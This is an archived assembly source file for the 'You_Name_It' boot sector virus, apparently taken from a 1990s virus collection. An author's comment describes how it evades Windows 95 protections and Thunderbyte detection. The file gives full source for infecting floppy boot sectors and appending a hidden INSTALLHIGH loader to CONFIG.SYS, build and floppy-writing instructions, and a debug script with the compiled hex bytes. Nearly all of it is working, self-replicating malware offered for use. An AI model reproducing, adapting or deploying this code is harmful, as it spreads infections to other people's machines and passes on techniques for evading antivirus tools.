HPAVC

home *** CD-ROM | disk | FTP | other *** search

/ HPAVC / HPAVC CD-ROM.iso / pc / CCTX0198.ZIP / QMUPDAT7.ZIP / UNAMEIT.ZIP / UNAMEIT.ASM next >

Wrap

Assembly Source File | 1997-02-05 | 15.6 KB | 381 lines

comment * Designed by "Q" the Misanthrope The "You_Name_It" virus needed to be made. Windows 95 has neglected the floppy boot sector virus long enough. Windows 95 in it's 32 bit protected mode has it's own floppy disk routines and doesn't use int 13 or int 40 anymore. When a floppy boot sector viruses infectes the hard disk of the Windows 95 computer, it would flag a change in the MBR or DBR indicating a possible virus attack (not good). The conclusion, don't hook int 13, hook int 21. Problem is, when Windows 95 starts up, it starts in DOS mode then changes to it's protected mode DOS so int 21 hooked in DOS mode isn't hooked anymore. Many of the multipatrite virii will not infect once Windows 95 starts. If your boot sector virus can infect a program called in your AUTOEXEC.BAT or you CONFIG.SYS then the virus would go resident. The "You_Name_it" virus does this. It creates a randomly named file and adds INSTALLHIGH=C:\AKYT.SQW (name is random) to the CONFIG.SYS file. Now when Windows 95's int 21 is called to change the default drive to A: then the infection occures. Also to armor the virus a NUL device by the same name as the virus is created so any reads, writes or deletes of the virus will go into NUL-Space. Also the boot sector infection will not attack the CONFIG.SYS multiple times. P.S. This virus will not be detected by Thunderbytes TBRESCUE Boot sector detector or CMOS virus protection. tasm unameit /m2 tlink unameit exe2bin unameit.exe unameit.com format a:/q/u debug unameit.com l 300 0 0 1 w 100 0 0 1 w 300 0 20 1 m 13e,2ff 100 rcx 1c2 w q unameit * .286 qseg segment byte public 'CODE' assume cs:qseg,es:qseg,ss:nothing,ds:qseg top: jmp short jmp_install ;boot sector data db 90h db 'MSDOS5.0' dw 512 db 1 dw 1 db 2 dw 224 dw 2880 db 0F0h dw 9 dw 18 dw 2 org 003eh com_install proc near jmp short go_mem_res com_install endp jmp_install proc near ;floppy boot up push cs ;for the retf to 0000:7c00 id equ $+1 mov si,7c00h ;7c00 is the infection marker lea bx,word ptr ds:[si] ;bx=7c00 push bx ;for the retf to 0000:7c00 cld push cs mov es,bx ;if monochrome copy code to pop ds ;7c00:7c00 cmp word ptr ds:[0449h],07h ;check if monochrome je monochrome push 0b800h ;lets reside in video memory pop es ;no need for that TOM cmp word ptr es:[si+id-top],si monochrome: push es ;check if already mem resident mov di,si ;di=7c00 mov cx,offset previous_hook ;copy loop varable push cx ;save it because we will copy push si ;the code twice to b800:7c00 rep movsb ;and b800:7dfe pop si pop cx call return_far ;goto b800 segment of code rep movsb ;continue copy to b800:7dfe mov si,1ah*04h ;only hook int 1a je already_res ;if already resident don't movsw ;hook again movsw mov word ptr ds:[si-02h],cs ;hook int 1a mov word ptr ds:[si-04h],offset interrupt_1a+7e00h-02h already_res: push ds ;read moved floppy boot sector pop es re_get_boot: mov ax,0201h jmp_install endp set_cx_dx proc near mov bp,word ptr ds:[bx+11h] ;code to point to last sector mov cx,word ptr ds:[bx+16h] ;of the root directory of any shr bp,04h ;floppy disk shl cx,01h add cx,bp inc cx mov dh,01h sub cx,word ptr ds:[bx+18h] int 13h ;read or write boot sector return_far: retf ;return to 7c00:0000 or set_cx_dx endp ;resident_21 routine config_line db "C:\CONFIG.SYS",00 ;file to infect install_name db 'INSTALLHIGH=' ;what to add file_name db 'C:\' ;random file name goes here db 00h dot equ $+3 crlf equ $+7 go_mem_res proc near ;CONFIG.SYS residency mov ah,30h ;dos versions less than 4.0 int 21h ;had their NUL pointer at cmp al,04h ;different locations so don't jb below_dos4 ;make NUL device if less than mov ah,52h ;dos 4.0 int 21h ;get list of lists cld lds si,dword ptr es:[bx+22h];point to second device push cs ;in device chain and break in pop es mov di,0060h-0ah ;at CS:60 there are 8 nice movsw ;spaces of 20h for device name movsw ;padding mov word ptr ds:[si-02h],cs ;break into device chain mov word ptr ds:[si-04h],0060h-0ah mov ax,8004h ;show nul char device stosw ;save it stosw ;strategy and interrupt stosw ;pointer can be anything mov ax,cs ;get filename from cs-1:0008 dec ax mov ds,ax mov si,0008h movsw ;file name is only 4 letters movsw ;before the . below_dos4: push cs pop ds mov es,word ptr ds:[si-0ch+2ch] mov ah,49h ;free up environment just cuz int 21h mov ax,3521h ;get int 21 int 21h ;save old int 21 mov word ptr ds:[previous_hook-com_install+0100h],bx mov word ptr ds:[previous_hook-com_install+0102h],es mov ax,2521h ;set int 21 mov dx,resident_21-com_install+0100h int 21h mov ah,31h ;go tsr mov dx,((tail-com_install+010fh) SHR 4) int 21h go_mem_res endp interrupt_21 proc near ;hooked in after int 1a sees pushf ;that dos loaded during boot pusha push ds push cs pop ds xor ah,4bh ;unload if a program starts jz set_21_back mov ax,3d42h ;open c:\config.sys mov dx,offset config_line+7e00h-02h int 18h ;really it is int 21 mov bx,5700h ;get date xchg ax,bx jc keep_trying ;unable to open c:\config.sys int 18h or cl,cl ;is c:\config.sys infected jz close_it pusha ;save file date mov ah,5ah ;create random file sub cx,cx mov dx,offset file_name+7e00h-02h int 18h mov bh,3eh ;close it xchg ax,bx ;then delete it because it has int 18h ;no extension mov ah,41h int 18h ;create new file using random mov ax,5b2eh ;file with . in 5th character mov byte ptr ds:[dot+7e00h-02h],al mov cl,05h ;file w/system and readonly int 18h mov dx,offset com_install+7c00h mov bh,40h ;write virus code into file xchg ax,bx mov ch,02h int 18h mov ah,3eh ;close it int 18h popa ;date and handle c:\config.sys inc ax ;set date pusha ;save it for later mov ax,4202h ;go to end of c:\config.sys sub cx,cx cwd int 18h mov ah,40h ;write INSTALLHIGH=C:\ line mov word ptr ds:[crlf+7e00h-02h],0a0dh mov cl,low(crlf-install_name+02h) mov dx,offset install_name+7e00h-02h int 18h ;be sure to cr lf terminate it popa ;get file date xor cl,cl ;blitz seconds and more int 18h close_it: mov ah,3eh ;close c:\config.sys int 18h set_21_back: lds dx,dword ptr ds:[previous_hook+7c00h] mov ax,2521h ;unhook ourselves because int 18h ;we have infection keep_trying: jmp pop_ds_and_all interrupt_21 endp resident_21 proc near ;memory resident int 21 pushf ;called when loaded from pusha ;config.sys push ds push es cmp ah,0eh ;is it set drive jne not_setcurrent or dl,dl ;drive A: jnz not_setcurrent cwd ;set varables to read sector mov bx,offset vbuffer-com_install+0100h push cs mov cx,0001h pop es push cs mov ax,0201h ;try reading the boot sector pop ds int 13h jc not_setcurrent ;if not don't infect cmp byte ptr ds:[bx+id-top+01h],7ch je not_setcurrent ;check if infected mov ax,0301h ;move and write boot sector pusha ;save for later push cs ;for far retf call set_cx_dx cld mov cx,previous_hook-com_install mov si,0100h ;copy virus to boot sector lea di,word ptr ds:[bx+com_install-top] rep movsb mov word ptr ds:[bx],0000h org $-2 jmp $(jmp_install-top) ;place initial jmp at front popa int 13h ;write it not_setcurrent: jmp short pop_it resident_21 endp org 001c3h interrupt_1a proc near ;hooked at boot and waits for pushf ;dos to load pusha mov ax,1200h ;dos loaded push ds push es cwd int 2fh inc al mov ds,dx ;if loaded then hook int 21 mov si,21h*04h ;sorry for all the complexity mov di,offset previous_hook+7c00h jnz pop_it ;and unhook int 1a les bx,dword ptr cs:[previous_hook+7e00h-02h] mov ds:[si-((21h-1ah)*04h)+2],es mov ds:[si-((21h-1ah)*04h)],bx les bx,dword ptr ds:[si] mov ds:[si-((21h-18h)*04h)+2],es push cs ;also save int 21 into int 18 cld mov ds:[si-((21h-18h)*04h)],bx pop es movsw movsw mov word ptr ds:[si-04h],offset interrupt_21+7c00h mov word ptr ds:[si-02h],cs ;set int 21 pop_it: pop es pop_ds_and_all: pop ds popa popf interrupt_1a endp org 001fdh far_jmp proc near db 0eah ;jmp to old int 1a or boot previous_hook: label double ;up int 21 or resident int 21 far_jmp endp boot_signature dw 0aa55h ;guess what org $+0002h vbuffer label byte ;buffer to read boot sector org $+0202h ;the end of the code tail label byte qseg ends end comment * debug script nunameit.com e0100 EB 74 0E BE 00 7C 8D 1C 53 FC 0E 8E C3 1F 83 3E e0110 49 04 07 74 08 68 00 B8 07 26 39 74 42 06 8B FE e0120 B9 FE 01 51 56 F3 A4 5E 59 E8 2B 00 F3 A4 BE 68 e0130 00 74 0A A5 A5 8C 4C FE C7 44 FC C1 7F 1E 07 B8 e0140 01 02 8B 6F 11 8B 4F 16 C1 ED 04 D1 E1 03 CD 41 e0150 B6 01 2B 4F 18 CD 13 CB 43 3A 5C 43 4F 4E 46 49 e0160 47 2E 53 59 53 00 49 4E 53 54 41 4C 4C 48 49 47 e0170 48 3D 43 3A 5C 00 B4 30 CD 21 3C 04 72 28 B4 52 e0180 CD 21 FC 26 C5 77 22 0E 07 BF 56 00 A5 A5 8C 4C e0190 FE C7 44 FC 56 00 B8 04 80 AB AB AB 8C C8 48 8E e01A0 D8 BE 08 00 A5 A5 0E 1F 8E 44 20 B4 49 CD 21 B8 e01B0 21 35 CD 21 89 1E C0 02 8C 06 C2 02 B8 21 25 BA e01C0 42 02 CD 21 B4 31 BA 4D 00 CD 21 9C 60 1E 0E 1F e01D0 80 F4 4B 74 62 B8 42 3D BA 94 7E CD 18 BB 00 57 e01E0 93 72 5D CD 18 0A C9 74 4A 60 B4 5A 2B C9 BA AE e01F0 7E CD 18 B7 3E 93 CD 18 B4 41 CD 18 B8 2E 5B A2 e0200 B5 7E B1 05 CD 18 BA 3E 7C B7 40 93 B5 02 CD 18 e0210 B4 3E CD 18 61 40 60 B8 02 42 2B C9 99 CD 18 B4 e0220 40 C7 06 B9 7E 0D 0A B1 19 BA A2 7E CD 18 61 32 e0230 C9 CD 18 B4 3E CD 18 C5 16 FE 7D B8 21 25 CD 18 e0240 EB 7A 9C 60 1E 06 80 FC 0E 75 37 0A D2 75 33 99 e0250 BB C4 02 0E B9 01 00 07 0E B8 01 02 1F CD 13 72 e0260 21 80 7F 43 7C 74 1B B8 01 03 60 0E E8 D3 FE FC e0270 B9 C0 01 BE 00 01 8D 7F 3E F3 A4 C7 07 EB 3E 61 e0280 CD 13 EB 37 00 9C 60 B8 00 12 1E 06 99 CD 2F FE e0290 C0 8E DA BE 84 00 BF FE 7D 75 20 2E C4 1E FC 7F e02A0 8C 44 E6 89 5C E4 C4 1C 8C 44 DE 0E FC 89 5C DC e02B0 07 A5 A5 C7 44 FC 09 7D 8C 4C FE 07 1F 61 9D EA e02C0 55 AA rcx 1c2 w q *